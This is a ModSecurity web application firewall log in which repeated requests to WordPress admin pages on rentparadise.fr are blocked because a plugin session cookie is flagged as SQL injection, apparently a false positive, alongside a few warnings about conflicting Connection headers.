[Mon May 11 22:32:21.241848 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI81aFW67LJTsgN3jQN8wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:21.785403 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI81aFW67LJTsgN3jQN8wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:22.255322 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI81qFW67LJTsgN3jQN9AAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:22.255620 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI81qFW67LJTsgN3jQN9AAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:22.826626 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI81qFW67LJTsgN3jQN9AAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:23.028579 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI816FW67LJTsgN3jQN9wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:23.028897 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI816FW67LJTsgN3jQN9wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:23.417779 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI816FW67LJTsgN3jQN9wAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:24.034600 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI82KFW67LJTsgN3jQN-QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:24.034888 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI82KFW67LJTsgN3jQN-QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:24.646639 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI82KFW67LJTsgN3jQN-QAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:24.955590 2026] [security2:error] [pid 1605480:tid 1605527] [client 170.106.84.136:52022] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/highlight/quest-ce-que-lengagement-au-travail-en-2024/"] [unique_id "agI82B2Cvzd_nyNfUm8BGgAAAQU"]
[Mon May 11 22:32:25.650554 2026] [security2:error] [pid 1606352:tid 1606437] [client 43.156.127.60:49988] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/Bulletin_adhe\\xcc\\x81sion-APOE-2021.pdf"] [unique_id "agI82Xo_DFxNSZVmaX3S0gAAANI"]
[Mon May 11 22:32:25.822470 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI82aFW67LJTsgN3jQN_gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:25.822770 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI82aFW67LJTsgN3jQN_gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:26.474284 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI82aFW67LJTsgN3jQN_gAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:27.135898 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI826FW67LJTsgN3jQOCAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:27.136209 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI826FW67LJTsgN3jQOCAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:27.751392 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI826FW67LJTsgN3jQOCAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:28.350076 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI83KFW67LJTsgN3jQODQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:28.350368 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI83KFW67LJTsgN3jQODQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:28.937512 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI83KFW67LJTsgN3jQODQAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:29.834829 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI83aFW67LJTsgN3jQOEAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:29.835128 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI83aFW67LJTsgN3jQOEAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:30.403296 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI83aFW67LJTsgN3jQOEAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:30.630350 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI83qFW67LJTsgN3jQOEgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:30.630689 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI83qFW67LJTsgN3jQOEgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:30.998967 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI83qFW67LJTsgN3jQOEgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:32.032179 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI84KFW67LJTsgN3jQOFgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:32.032462 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI84KFW67LJTsgN3jQOFgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:32.637146 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI84KFW67LJTsgN3jQOFgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:33.426495 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI84aFW67LJTsgN3jQOGgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:33.426782 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI84aFW67LJTsgN3jQOGgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:34.041661 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI84aFW67LJTsgN3jQOGgAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:34.841054 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI84qFW67LJTsgN3jQOHAAAABU"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:32:34.841335 2026] [security2:error] [pid 1588898:tid 1589210] [client 103.59.161.151:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI84qFW67LJTsgN3jQOHAAAABU"], referer: https://rentparadise.fr/wp-login.php
